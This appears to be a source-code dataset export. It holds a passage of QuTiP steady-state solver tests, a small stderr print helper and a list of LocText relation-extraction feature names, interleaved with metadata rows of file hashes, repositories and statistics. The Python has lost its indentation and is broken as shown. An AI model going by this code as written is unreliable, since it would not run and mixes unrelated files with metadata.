sz = sigmaz()
sm = destroy(2)
H = 0.5 * 2 * np.pi * sz
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * sm)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * sm.dag())
rho_ss = steadystate(H, c_op_list, method='iterative-bicgstab')
p_ss[idx] = expect(sm.dag() * sm, rho_ss)
p_ss_analytic = np.exp(-1.0 / wth_vec) / (1 + np.exp(-1.0 / wth_vec))
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-5, True)
def test_ho_direct():
"Steady state: Thermal HO - direct solver"
# thermal steadystate of an oscillator: compare numerics with analytical
# formula
a = destroy(40)
H = 0.5 * 2 * np.pi * a.dag() * a
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * a)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * a.dag())
rho_ss = steadystate(H, c_op_list, method='direct')
p_ss[idx] = np.real(expect(a.dag() * a, rho_ss))
p_ss_analytic = 1.0 / (np.exp(1.0 / wth_vec) - 1)
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-3, True)
def test_ho_eigen():
"Steady state: Thermal HO - eigen solver"
# thermal steadystate of an oscillator: compare numerics with analytical
# formula
a = destroy(40)
H = 0.5 * 2 * np.pi * a.dag() * a
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * a)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * a.dag())
rho_ss = steadystate(H, c_op_list, method='eigen')
p_ss[idx] = np.real(expect(a.dag() * a, rho_ss))
p_ss_analytic = 1.0 / (np.exp(1.0 / wth_vec) - 1)
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-3, True)
def test_ho_power():
"Steady state: Thermal HO - power solver"
# thermal steadystate of an oscillator: compare numerics with analytical
# formula
a = destroy(40)
H = 0.5 * 2 * np.pi * a.dag() * a
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * a)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * a.dag())
rho_ss = steadystate(H, c_op_list, method='power', mtol=1e-5)
p_ss[idx] = np.real(expect(a.dag() * a, rho_ss))
p_ss_analytic = 1.0 / (np.exp(1.0 / wth_vec) - 1)
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-3, True)
def test_ho_power_gmres():
"Steady state: Thermal HO - power-gmres solver"
# thermal steadystate of an oscillator: compare numerics with analytical
# formula
a = destroy(40)
H = 0.5 * 2 * np.pi * a.dag() * a
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * a)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * a.dag())
rho_ss = steadystate(H, c_op_list, method='power-gmres', mtol=1e-1,
use_precond=1)
p_ss[idx] = np.real(expect(a.dag() * a, rho_ss))
p_ss_analytic = 1.0 / (np.exp(1.0 / wth_vec) - 1)
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-3, True)
def test_ho_power_bicgstab():
"Steady state: Thermal HO - power-bicgstab solver"
# thermal steadystate of an oscillator: compare numerics with analytical
# formula
a = destroy(40)
H = 0.5 * 2 * np.pi * a.dag() * a
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * a)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * a.dag())
rho_ss = steadystate(H, c_op_list, method='power-bicgstab',use_precond=1)
p_ss[idx] = np.real(expect(a.dag() * a, rho_ss))
p_ss_analytic = 1.0 / (np.exp(1.0 / wth_vec) - 1)
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-3, True)
def test_ho_gmres():
"Steady state: Thermal HO - iterative-gmres solver"
# thermal steadystate of an oscillator: compare numerics with analytical
# formula
a = destroy(40)
H = 0.5 * 2 * np.pi * a.dag() * a
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * a)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * a.dag())
rho_ss = steadystate(H, c_op_list, method='iterative-gmres')
p_ss[idx] = np.real(expect(a.dag() * a, rho_ss))
p_ss_analytic = 1.0 / (np.exp(1.0 / wth_vec) - 1)
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-3, True)
def test_ho_bicgstab():
"Steady state: Thermal HO - iterative-bicgstab solver"
# thermal steadystate of an oscillator: compare numerics with analytical
# formula
a = destroy(40)
H = 0.5 * 2 * np.pi * a.dag() * a
gamma1 = 0.05
wth_vec = np.linspace(0.1, 3, 20)
p_ss = np.zeros(np.shape(wth_vec))
for idx, wth in enumerate(wth_vec):
n_th = 1.0 / (np.exp(1.0 / wth) - 1) # bath temperature
c_op_list = []
rate = gamma1 * (1 + n_th)
c_op_list.append(np.sqrt(rate) * a)
rate = gamma1 * n_th
c_op_list.append(np.sqrt(rate) * a.dag())
rho_ss = steadystate(H, c_op_list, method='iterative-bicgstab')
p_ss[idx] = np.real(expect(a.dag() * a, rho_ss))
p_ss_analytic = 1.0 / (np.exp(1.0 / wth_vec) - 1)
delta = sum(abs(p_ss_analytic - p_ss))
assert_equal(delta < 1e-3, True)
def test_driven_cavity_direct():
"Steady state: Driven cavity - direct solver"
N = 30
Omega = 0.01 * 2 * np.pi
Gamma = 0.05
a = destroy(N)
H = Omega * (a.dag() + a)
c_ops = [np.sqrt(Gamma) * a]
rho_ss = steadystate(H, c_ops, method='direct')
rho_ss_analytic = coherent_dm(N, -1.0j * (Omega)/(Gamma/2))
assert_((rho_ss - rho_ss_analytic).norm() < 1e-4)
def test_driven_cavity_eigen():
"Steady state: Driven cavity - eigen solver"
N = 30
Omega = 0.01 * 2 * np.pi
Gamma = 0.05
a = destroy(N)
H = Omega * (a.dag() + a)
c_ops = [np.sqrt(Gamma) * a]
rho_ss = steadystate(H, c_ops, method='eigen')
rho_ss_analytic = coherent_dm(N, -1.0j * (Omega)/(Gamma/2))
assert_((rho_ss - rho_ss_analytic).norm() < 1e-4)
def test_driven_cavity_power():
"Steady state: Driven cavity - power solver"
N = 30
Omega = 0.01 * 2 * np.pi
Gamma = 0.05
a = destroy(N)
H = Omega * (a.dag() + a)
c_ops = [np.sqrt(Gamma) * a]
rho_ss = steadystate(H, c_ops, method='power', mtol=1e-5,)
rho_ss_analytic = coherent_dm(N, -1.0j * (Omega)/(Gamma/2))
assert_((rho_ss - rho_ss_analytic).norm() < 1e-4)
def test_driven_cavity_power_gmres():
"Steady state: Driven cavity - power-gmres solver"
N = 30
Omega = 0.01 * 2 * np.pi
Gamma = 0.05
a = destroy(N)
H = Omega * (a.dag() + a)
c_ops = [np.sqrt(Gamma) * a]
M = build_preconditioner(H, c_ops, method='power')
rho_ss = steadystate(H, c_ops, method='power-gmres', M=M, mtol=1e-1,
use_precond=1)
rho_ss_analytic = coherent_dm(N, -1.0j * (Omega)/(Gamma/2))
assert_((rho_ss - rho_ss_analytic).norm() < 1e-4)
def test_driven_cavity_power_bicgstab():
"Steady state: Driven cavity - power-bicgstab solver"
N = 30
Omega = 0.01 * 2 * np.pi
Gamma = 0.05
a = destroy(N)
H = Omega * (a.dag() + a)
c_ops = [np.sqrt(Gamma) * a]
M = build_preconditioner(H, c_ops, method='power')
rho_ss = steadystate(H, c_ops, method='power-bicgstab', M=M, use_precond=1)
rho_ss_analytic = coherent_dm(N, -1.0j * (Omega)/(Gamma/2))
assert_((rho_ss - rho_ss_analytic).norm() < 1e-4)
def test_driven_cavity_gmres():
"Steady state: Driven cavity - iterative-gmres solver"
N = 30
Omega = 0.01 * 2 * np.pi
Gamma = 0.05
a = destroy(N)
H = Omega * (a.dag() + a)
c_ops = [np.sqrt(Gamma) * a]
rho_ss = steadystate(H, c_ops, method='iterative-gmres')
rho_ss_analytic = coherent_dm(N, -1.0j * (Omega)/(Gamma/2))
assert_((rho_ss - rho_ss_analytic).norm() < 1e-4)
def test_driven_cavity_bicgstab():
"Steady state: Driven cavity - iterative-bicgstab solver"
N = 30
Omega = 0.01 * 2 * np.pi
Gamma = 0.05
a = destroy(N)
H = Omega * (a.dag() + a)
c_ops = [np.sqrt(Gamma) * a]
rho_ss = steadystate(H, c_ops, method='iterative-bicgstab')
rho_ss_analytic = coherent_dm(N, -1.0j * (Omega)/(Gamma/2))
assert_((rho_ss - rho_ss_analytic).norm() < 1e-4)
if __name__ == "__main__":
run_module_suite()
| 30.414729
| 82
| 0.592838
| 2,606
| 15,694
| 3.375672
| 0.040292
| 0.023872
| 0.044561
| 0.02785
| 0.953507
| 0.898943
| 0.891781
| 0.891781
| 0.891213
| 0.891213
| 0
| 0.044314
| 0.260928
| 15,694
| 515
| 83
| 30.473786
| 0.714113
| 0.146617
| 0
| 0.841667
| 0
| 0
| 0.084837
| 0
| 0
| 0
| 0
| 0
| 0.061111
| 1
| 0.058333
| false
| 0
| 0.008333
| 0
| 0.066667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
94271bbb623d9ddb4cf1db355f75f122b4982a50
| 208
|
py
|
Python
|
confprint/err_print.py
|
lewiuberg/confprint
|
d092875b5bdac358c427d071371a9df991c0c6ab
|
[
"MIT"
] | 1
|
2022-02-09T08:11:34.000Z
|
2022-02-09T08:11:34.000Z
|
confprint/err_print.py
|
lewiuberg/confprint
|
d092875b5bdac358c427d071371a9df991c0c6ab
|
[
"MIT"
] | 10
|
2021-10-17T05:59:47.000Z
|
2022-02-03T15:14:55.000Z
|
confprint/err_print.py
|
lewiuberg/confprint
|
d092875b5bdac358c427d071371a9df991c0c6ab
|
[
"MIT"
] | null | null | null |
"""err_print uses sys.stderr.write() as the printer function."""
import sys
def err_print(*args, **kwargs) -> None:
"""Use sys.stderr.write() as print()."""
print(*args, file=sys.stderr, **kwargs)
| 23.111111
| 64
| 0.644231
| 30
| 208
| 4.4
| 0.566667
| 0.204545
| 0.212121
| 0.242424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 208
| 8
| 65
| 26
| 0.75
| 0.447115
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0.666667
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 9
|
9479ec0280e5a6db9ef83de88c152ec2cee88033
| 23,291
|
py
|
Python
|
resources/features/selected/0_True_LinearSVC_C=2.0-1487943476.673364-NAMES.py
|
Rostlab/LocText
|
3871f860a5a68c192fadca3f9a9af9e7df3f2887
|
[
"Apache-2.0"
] | 4
|
2017-06-18T06:39:35.000Z
|
2019-02-19T02:54:32.000Z
|
resources/features/selected/0_True_LinearSVC_C=2.0-1487943476.673364-NAMES.py
|
juanmirocks/LocText
|
3871f860a5a68c192fadca3f9a9af9e7df3f2887
|
[
"Apache-2.0"
] | 35
|
2016-10-22T12:30:30.000Z
|
2017-03-25T09:58:43.000Z
|
resources/features/selected/0_True_LinearSVC_C=2.0-1487943476.673364-NAMES.py
|
juanmirocks/LocText
|
3871f860a5a68c192fadca3f9a9af9e7df3f2887
|
[
"Apache-2.0"
] | 2
|
2017-12-19T14:54:07.000Z
|
2019-12-10T01:23:30.000Z
|
[
"SentenceFeatureGenerator::1.2_counts_total_int_total (all classes)_[0]", # 0
"SentenceFeatureGenerator::1.1_counts_individual_int_individual_e_3_[0]", # 1
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<->_[0]", # 2
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<localize>_[0]", # 3
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_1_<PUNCT>_[0]", # 4
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<NOUN ~~ PUNCT>_[0]", # 5
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<NOUN ~~ TARGET]>_[0]", # 6
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<VERB ~~ NOUN ~~ PUNCT>_[0]", # 7
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<PUNCT ~~ NOUN ~~ NOUN>_[0]", # 8
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<an>_[0]", # 9
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_1_<ADP>_[0]", # 10
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_1_<NUM>_[0]", # 11
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<[SOURCE ~~ VERB>_[0]", # 12
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<VERB ~~ ADP>_[0]", # 13
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<as>_[0]", # 14
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_1_<VERB>_[0]", # 15
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_1_<NOUN>_[0]", # 16
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_1_<amod>_[0]", # 17
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_2_<[SOURCE ~~ VERB>_[0]", # 18
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_2_<ADP ~~ NOUN>_[0]", # 19
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<appos ~~ amod>_[0]", # 20
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<[SOURCE ~~ VERB ~~ ADP>_[0]", # 21
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<ADP ~~ NOUN ~~ NOUN>_[0]", # 22
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<)>_[0]", # 23
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<a>_[0]", # 24
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_1_<PROPN>_[0]", # 25
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<e_2 ~~ e_2>_[0]", # 26
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<ADJ ~~ NOUN>_[0]", # 27
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<PROPN ~~ NUM>_[0]", # 28
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<e_1 ~~ e_1 ~~ e_1>_[0]", # 29
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<ADJ ~~ NOUN ~~ PUNCT>_[0]", # 30
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ PUNCT ~~ VERB>_[0]", # 31
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<PUNCT ~~ PROPN ~~ NUM>_[0]", # 32
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<[SOURCE ~~ NOUN>_[0]", # 33
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<mutant>_[0]", # 34
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<, ~~ the>_[0]", # 35
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<DET ~~ PROPN>_[0]", # 36
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<ADJ ~~ VERB>_[0]", # 37
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<in ~~ the ~~ TARGET]>_[0]", # 38
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<VERB ~~ ADP ~~ DET>_[0]", # 39
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<in>_[0]", # 40
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<pobj ~~ prep>_[0]", # 41
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<pobj ~~ prep ~~ pobj>_[0]", # 42
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<of>_[0]", # 43
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<cell>_[0]", # 44
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<at ~~ the>_[0]", # 45
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<DET ~~ NOUN>_[0]", # 46
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<ADP ~~ NOUN>_[0]", # 47
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<CONJ ~~ ADP>_[0]", # 48
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<at ~~ the ~~ TARGET]>_[0]", # 49
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<ADP ~~ NOUN ~~ VERB>_[0]", # 50
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ ADP ~~ DET>_[0]", # 51
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<subunit>_[0]", # 52
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<NOUN ~~ ADP ~~ TARGET]>_[0]", # 53
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<be>_[0]", # 54
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<VERB ~~ ADJ>_[0]", # 55
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<ADJ ~~ NOUN ~~ ADP>_[0]", # 56
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<e_1>_[0]", # 57
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<be>_[0]", # 58
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<from>_[0]", # 59
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_1_<nmod>_[0]", # 60
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_1_<acomp>_[0]", # 61
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_2_<NOUN ~~ VERB>_[0]", # 62
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<VERB ~~ PROPN>_[0]", # 63
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<[SOURCE ~~ NOUN ~~ ADP>_[0]", # 64
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ CONJ ~~ VERB>_[0]", # 65
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_1_<dobj>_[0]", # 66
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<ADP ~~ NOUN ~~ VERB>_[0]", # 67
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<NOUN ~~ VERB ~~ NOUN>_[0]", # 68
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<ADP ~~ NOUN ~~ TARGET]>_[0]", # 69
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<, ~~ and>_[0]", # 70
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<ADJ ~~ TARGET]>_[0]", # 71
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_1_<relcl>_[0]", # 72
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<e_3>_[0]", # 73
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<PROPN ~~ PROPN>_[0]", # 74
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<PROPN ~~ PUNCT ~~ PROPN>_[0]", # 75
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<e_1 ~~ and>_[0]", # 76
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_2_<VERB ~~ PROPN>_[0]", # 77
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<with ~~ e_1>_[0]", # 78
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<e_1 ~~ at>_[0]", # 79
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<[SOURCE ~~ and>_[0]", # 80
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<[SOURCE ~~ CONJ>_[0]", # 81
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_2_<[SOURCE ~~ ADP>_[0]", # 82
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<[SOURCE ~~ ADP>_[0]", # 83
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<small>_[0]", # 84
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_2_<VERB ~~ VERB>_[0]", # 85
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<[SOURCE ~~ NOUN ~~ TARGET]>_[0]", # 86
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<transporter>_[0]", # 87
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<that>_[0]", # 88
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<PUNCT ~~ NUM>_[0]", # 89
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<ADV ~~ VERB>_[0]", # 90
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<, ~~ e_1 ~~ e_1>_[0]", # 91
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<PUNCT ~~ CONJ ~~ PROPN>_[0]", # 92
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ NOUN ~~ NUM>_[0]", # 93
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NUM ~~ PUNCT ~~ NUM>_[0]", # 94
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_1_<nsubjpass>_[0]", # 95
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_2_<PROPN ~~ VERB>_[0]", # 96
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<[SOURCE ~~ PUNCT ~~ NOUN>_[0]", # 97
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<[SOURCE ~~ NOUN ~~ VERB>_[0]", # 98
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<( ~~ NUM>_[0]", # 99
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<ADP ~~ TARGET]>_[0]", # 100
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_1_<like>_[0]", # 101
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<NUM ~~ VERB>_[0]", # 102
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<[SOURCE ~~ of>_[0]", # 103
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<ccomp ~~ dobj>_[0]", # 104
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<[SOURCE ~~ VERB ~~ DET>_[0]", # 105
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<associate>_[0]", # 106
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<( ~~ e_1>_[0]", # 107
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<e_1 ~~ )>_[0]", # 108
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<( ~~ e_1 ~~ e_1>_[0]", # 109
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ ADP ~~ TARGET]>_[0]", # 110
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<compound ~~ compound>_[0]", # 111
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<appos ~~ prep ~~ pobj>_[0]", # 112
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<ADP ~~ ADJ ~~ TARGET]>_[0]", # 113
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<prep ~~ advcl>_[0]", # 114
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<PUNCT ~~ TARGET]>_[0]", # 115
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<PUNCT ~~ NOUN ~~ CONJ>_[0]", # 116
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<prep ~~ advmod>_[0]", # 117
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<pobj ~~ prep ~~ advmod>_[0]", # 118
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<PROPN ~~ VERB>_[0]", # 119
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<expression>_[0]", # 120
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<CONJ ~~ ADJ>_[0]", # 121
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<CONJ ~~ DET ~~ NOUN>_[0]", # 122
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<conj ~~ dobj ~~ prep>_[0]", # 123
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<[SOURCE ~~ protein>_[0]", # 124
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<protein ~~ be>_[0]", # 125
"DependencyFeatureGenerator::23_PD_pos_N_gram_PD_3_<VERB ~~ NOUN ~~ TARGET]>_[0]", # 126
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<to ~~ the>_[0]", # 127
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_2_<e_1 ~~ localize>_[0]", # 128
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<nsubj ~~ dobj>_[0]", # 129
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_3_<nsubj ~~ dobj ~~ prep>_[0]", # 130
"DependencyFeatureGenerator::26_PD_undirected_edges_N_gram_PD_2_<dobj ~~ acl>_[0]", # 131
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<be ~~ TARGET]>_[0]", # 132
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ VERB ~~ ADJ>_[0]", # 133
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ - ~~ NUM>_[0]", # 134
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<VERB ~~ ADP ~~ ADJ>_[0]", # 135
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ PUNCT ~~ ADP>_[0]", # 136
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<PUNCT ~~ ADP ~~ NOUN>_[0]", # 137
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<NOUN ~~ NOUN ~~ PROPN>_[0]", # 138
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_3_<PROPN ~~ ADP ~~ TARGET]>_[0]", # 139
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<[SOURCE ~~ e_1>_[0]", # 140
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<[SOURCE ~~ e_1 ~~ e_1>_[0]", # 141
"DependencyFeatureGenerator::22_PD_bow_N_gram_PD_3_<[SOURCE ~~ for ~~ formation>_[0]", # 142
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<[SOURCE ~~ TARGET]>_[0]", # 143
"DependencyFeatureGenerator::19_LD_pos_N_gram_LD_2_<[SOURCE ~~ TARGET]>_[0]", # 144
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_1_<require>_[0]", # 145
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<a ~~ e_1>_[0]", # 146
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<require ~~ to>_[0]", # 147
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_3_<a ~~ e_1 ~~ e_1>_[0]", # 148
"DependencyFeatureGenerator::18_LD_bow_N_gram_LD_2_<[SOURCE ~~ require>_[0]", # 149
